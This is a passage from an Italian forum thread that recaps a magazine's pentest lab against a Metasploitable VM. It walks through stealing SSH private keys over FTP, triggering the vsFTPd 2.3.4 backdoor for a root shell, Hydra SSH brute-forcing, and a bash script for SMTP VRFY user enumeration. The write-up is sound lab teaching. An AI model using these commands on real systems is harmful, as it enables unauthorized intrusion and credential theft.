Connect with us




Riepilogo laboratorio di pentest.  

Pagina 4 / 4 Precedente
  RSS

occhiolino
(@occhiolino)
New Member
Registrato: 3 mesi fa
Post: 3
06/12/2018 7:39 pm  

Ciao. Figurati, avevo capito. Comunque ho omesso di dire che il Router l'ho configurato con 3 schede di rete (cosi come da guida su questo forum e non come riporta la rivista) dando alla prima scheda di rete queste impostazioni:

Scheda solo host

VirtualBox Host-Only Ethernet Adapter #2

Sono al punto di partenza. Ma come mai sulla rivista questa configurazione manca? E per quanto riguarda gli indirizzi ip assegnati alle macchine vanno bene?


RispondiQuota
Whistler
(@whistler)
Trusted Member
Registrato: 12 mesi fa
Post: 57
06/12/2018 7:45 pm  

Questa configurazione viene fatta nei numeri successivi usciti tra marzo e aprile ovvero quando ho iniziato a scrivere questo riepilogo e ho pensato di partire da quella dato che altrimenti poi bisogna riconfigurare tutto una seconda volta se si segue l'ordine esatto delle riviste.


RispondiQuota
Whistler
(@whistler)
Trusted Member
Registrato: 12 mesi fa
Post: 57
06/12/2018 7:52 pm  

Quanto agli IP si sono corretti e anche i comandi, per questo temo che il problema stia nelle impostazioni di Virtualbox.

l'impostazione "VirtualBox Host-Only Ethernet Adapter #2" io non ce l'ho, per caso è un'opzione di "Tipo di scheda"?

Nel caso in questa voce io ho l'opzione "PCnet-FAST III (Am79C973)"

 


RispondiQuota
Dioil92
(@dioil92)
Active Member
Registrato: 1 anno fa
Post: 9
15/02/2019 4:02 pm  

Ciao, anch'io ho lo stesso identico problema, non riesco ad accedere da browser all'IP 192.168.0.75, ho configurato tutto come da rivista, allego degli screen( link mega ), non so più che fare. Grazie per l'aiuto.  https://mega.nz/#F!lR9RmArQ!nRDfSYMU4TmdiLP3a1x3jw


RispondiQuota
Whistler
(@whistler)
Trusted Member
Registrato: 12 mesi fa
Post: 57
18/02/2019 2:40 pm  

Ciao ho provato ad aprire il tuo link ma non ho trovato nessuna foto, hai ancora lo stesso problema?

Ti consiglio di ricontrollare bene i passaggi, in quella sezione della guida anch'io ho avuto problemi e ho risolto solo ricominciando da capo la configurazione.

Fammi sapere.


RispondiQuota
Whistler
(@whistler)
Trusted Member
Registrato: 12 mesi fa
Post: 57
18/02/2019 2:43 pm  

11.0 ATTACCO AL SERVER FTP.

Salve a tutti e ben ritrovati, mi scuso per la mia lunga assenza ma vedo subito di rimediare con tutti i riepiloghi mancanti (ovviamente quello di questo mese non ci sarà fino al mese prossimo).

In questa guida la rivista ci insegna ad interagire con il servizio FTP della macchina virtuale "Server Web" e ad ottenere da qui un accesso con privilegi di root sfruttando una falla molto grave presente in metasploitable.

11.1 I PRIMI PASSI CON TELNET.

Cominciamo connettendoci al server FTP in esecuzione sulla porta 21 della VM.

#telnet webserver.labpentest.hj 21

Dopo la visualizzazione del banner ci autentichiamo usando i comandi "user" (nome utente) e "pass" (password) con le credenziali ottenute grazie a Hydra nei passi precedenti.
Pertanto..

user user

(..e poi)

pass user

Ricevuto il messaggio di avvenuto log in, diamo il comando "pasv" al fine di aprire un canale dati ftp.
Tale comando ci restituisce il seguente messaggio di conferma: 227 Entering Passive Mode (212,100,1,2,37,220).

I primi 4 numeri sono quelli dell'IP della macchina mentre gli ultimi 2 rappresentano quelli della porta alla quale collegarsi (il 37 è il byte più significativo mentre il 220 è il meno significativo) dai quali otteniamo il numero di porta con un semplice calcolo: 37 * 256 + 220 = 9692.

Apriamo una nuova shell e lanciamo il comando:

#nc 212.100.1.2 9692

Da questa shell abbiamo stabilito la connessione dati e pertanto da qui vedremo l'output dei comandi inviati alla prima shell con telnet, dalla quale viene lanciato il comando "list -la".

 


RispondiQuota
Whistler
(@whistler)
Trusted Member
Registrato: 12 mesi fa
Post: 57
18/02/2019 2:44 pm  

11.2 UNA BRECCIA TIRA L'ALTRA.

In seguito al comando precedente abbiamo ottenuto una lista completa dei file dell'utente user sulla VM "Web Server" e tra questi, due spiccano per importanza: .bash_history e .ssh.

Nella shell dei comandi (dove abbiamo lanciato telnet per capirci) lanciamo i seguenti comandi:

pasv
(da qui otteniamo il numero di porta necessario per aprire una nuova connessione dati con nc)

retr .bash_history FTP
(comando che consente di effettuare il download del file selezionato).

11.3 LE CHIAVI SSH.

Analizzando il file .bash_history possiamo vedere la cronologia dei comandi dell'utente user da cui scopriamo che sono state create due chiavi crittografiche ssh (una pubblica e una privata) e che tali chiavi sono state copiate nella home directory di un utente che non avevamo ancora scoperto sul sistema: l'utente msfadmin.
Senza perdere tempo, sulla shell di telnet lanciamo i seguenti comandi per rubare (ehm volevo dire scaricare) le chiavi citate prima.

cwd .ssh
(per spostarci nella stessa directory delle chiavi)

pasv
(seguito da una seconda shell da cui lanciare nc per la connessione dati come abbiamo fatto prima)

retr id_dsa
(per avviare il download della chiave privata)

ripetiamo i passaggi precedenti cambiando solo id_dsa con id_dsa.pub e avremo ottenuto entrambe le chiavi.

11.4 vsFTPd 2.3.4 HA UN SEGRETO.

Grazie a nmap abbiamo scoperto che il server FTP in esecuzione sul Web Server è vsFTPd 2.3.4 e facendo qualche rapida ricerca è possibile scoprire come questa versione del sever è caratterizzata da una vulnerabilità catastrofica: una backdoor.
Non si sa chi l'ha messa nel pacchetto ufficiale e stando ai risultati della ricerca per usarla è sufficiente fare un login con uno smile ":)" sulla stringa dell'username e con una password arbitraria, per poi aprire una connessione dati con nc sulla porta 6200.

#telnet webserver.labpentest.hj 21

user prova:)
pass prova

e su una seconda shell..

#nc 212.100.1.2 6200

dopodichè lanciamo il comando whoami che ci rivelerà di essere l'utente root sulla macchina virtuale "Web Server".


RispondiQuota
Whistler
(@whistler)
Trusted Member
Registrato: 12 mesi fa
Post: 57
18/02/2019 2:45 pm  

12.0 ATTACCO A SSH.

Dopo aver effettuato un'analisi delle vulnerabilità del servizio FTP del sever web possiamo passare a muoverci verso ssh, un servizio importantissimo per la gestione in remoto tramite connessione cifrata.

12.1 IL PRIMO LOGIN.

Cominciamo subito loggandoci con le credenziali dell'utente "user".

#ssh [email protected] 22

esserci loggati è già un buon risultato ma ci sono test da fare per ottenere maggiori informazioni su questo utente.

#groups

#sudo -v

il primo comando serve a sapere a quale gruppo di utenti appartiene l'utente e riceviamo come output il nome utente il che probabilmente indica che l'utente non è privilegiato, mentre il secondo comando ci confermerà questo timore.

Se da bravi pentester ripetiamo il procedimento anche per gli altri utenti di cui possediamo le credenziali purtroppo avremo i medesimi risultati.

12.2 L'UTENTE MSFADMIN.

Grazie alle indagini precedenti abbiamo scoperto l'esistenza dell'utente molto promettente msfadmin del quale però non sappiamo ancora la password.. si non ancora..

#hydra -t 3 -l msfadmin -e nsr webserver.labpentest.hj ssh

così facendo abbiamo testato se anche questo utente avesse una password banale sul servizio ssh e infatti la password coincide con il nome utente.

Lanciamo il comando..

#ssh [email protected] 22

e una volta loggati..

#sudo su

e anche stavolta avremo ottenuto un accesso da root!


RispondiQuota
Whistler
(@whistler)
Trusted Member
Registrato: 12 mesi fa
Post: 57
18/02/2019 2:46 pm  

12.3 IL SERVIZIO TELNET (NON IL COMANDO).

Dopo aver ottenuto i privilegi di root sul servizio ssh ci concentriamo brevemente sul servizio telnet presente sulla porta TCP 23 con l'omonimo comando.

#telnet webserver.labpentest.hj

L'output è a dir poco sconcertante in quanto ci appare un banner con le credenziali per accedere con l'utente amministratore msfadmin e otteniamo un altro accesso da root sul sistema bersaglio.
Ciò è ovviamente dovuto al fatto che la distro metaspoitable è usata come sacco da box virtuale per imparare ad usare i tool di cybersecurity e gli sviluppatori hanno messo anche qui un banner che raccomanda di non esporla a internet o a reti non controllate da noi direttamente.

12.4 IL SERVIZIO SMTP.

Un altro servizio da analizzare è sicuramente il servizio SMTP, pensato per lo scambio di mail in una logica client-server, al quale ci interfacciamo con i seguenti comandi:

#telnet webserver.labpentest.hj 25

ricevuto il messaggio di avvenuta connessione inviamo i comandi

HELO hj
(necessario alla nostra autenticazione che tuttavia è arbitraria)
VRFY user
(comando con il quale chiediamo se è presente l'utente "user", e riceveremo un messaggio di conferma)
VRFY HackerJournal
(comando per analizzare la risposta del server in caso un utente richiesto non sia presente)

In conclusione abbiamo scoperto come interrogare il servizio SMTP per ottenere informazioni riguardo la presenza o meno di un utente sul sistema bersaglio.
Ora dobbiamo solo trovare il modo di automatizzare il processo e ricavarne una lista tutti gli utenti presenti.


RispondiQuota
Whistler
(@whistler)
Trusted Member
Registrato: 12 mesi fa
Post: 57
18/02/2019 2:47 pm  

13.0 COSTRUIRE UN TOOL PER ESTRAPOLARE GLI UTENTI DAL SERVIZIO SMTP.

Abbiamo compreso i comandi base per interrogare il servizio SMTP della macchina vittima, in particolare come interrogarlo riguardo la presenza o meno di un utente tramite il comando VRFY, ora passiamo a come automatizzare il processo per verificare la presenza di utenti usando uno dei dizionari disponibili in Kali Linux.

13.1 MODIFICA DEL DIZIONARIO CON "SED".

Cominciamo dal dizionario facendone una copia che possiamo modificare tranquillamente e tramite il comando sed mettiamo all'inizio di ogni riga la stringa "VRFY".

#cp /usr/share/wordlist/metasploit/unix_users.txt ./
#sed -e 's/^/VRFY /' -i unix_users.txt

Se useremo questo file per interagire con il server SMTP dobbiamo aggiungere all'inizio la stringa "HELO hj" quindi creiamo un nuovo file con essa e lo uniamo a unix_users.txt.

#echo "HELO HJ > input.txt"
#cat unix_users.txt >> input.txt

Infine passiamo il file input.txt in input alla connessione che apriremo con nc e mandiamo l'output in un file testuale.

#nc webserver.labpentest.hj 25 < input.txt > output.txt

Tuttavia la questione non è così semplice..
Lanciamo i comandi:

#wc -l input.txt
#wc -l output.txt

Confrontando i file input.txt e output.txt c'è una differenza di molte righe e controllando l'ultima riga del file di output noteremo un messaggio di errore che ferma le richieste di verifica utente al ventesimo errore.
Pertanto sarà necessario dividere il file di input in più parti e creare uno script in bash.


RispondiQuota
Whistler
(@whistler)
Trusted Member
Registrato: 12 mesi fa
Post: 57
18/02/2019 2:48 pm  

13.3 MANIPOLIAMO IL FILE DI TESTO E CREIAMO IL NOTRO TOOL.

Attraverso i comandi

#split input.txt -l 19 -d -a 1 enum_list
#sed -i 'HELO HJ' enum_list*

divideremo in 6 parti il file input.txt e aggiungeremo ad ognuna la stringa di autenticazione.
Lanciamo anche i comandi

#mkdir hj_enum_tool
#mv enum_list* hj_enum_tool
#cd hj_enum_tool

così da tenere tutto in una directory dedicata al nostro script e apriamo un editor a piacere per scriverlo e intitolarlo hj_tool.sh.

Ecco lo script completo:

#!/bin/bash
for i in `seq 0 5`;
do
cmd="echo 'QUIT' >> enum_list$i"
eval $cmd
cmd="nc 212.100.1.2 25 < enum_list$i >> enum_result.txt"
echo "eseguo $cmd..."
eval $cmd
done
grep '252' enum_result.txt | awk '{print $NF}' > users_list.txt

13.4 LANCIAMO IL TOOL!

Digitiamo..

#./hj_tool.sh

e ammiriamo il nostro script all'opera che ci restituisce una lista di ben 28 utenti.


RispondiQuota
Pagina 4 / 4 Precedente
Share:

IN EDICOLA

  
Working

Please Login or Registrazione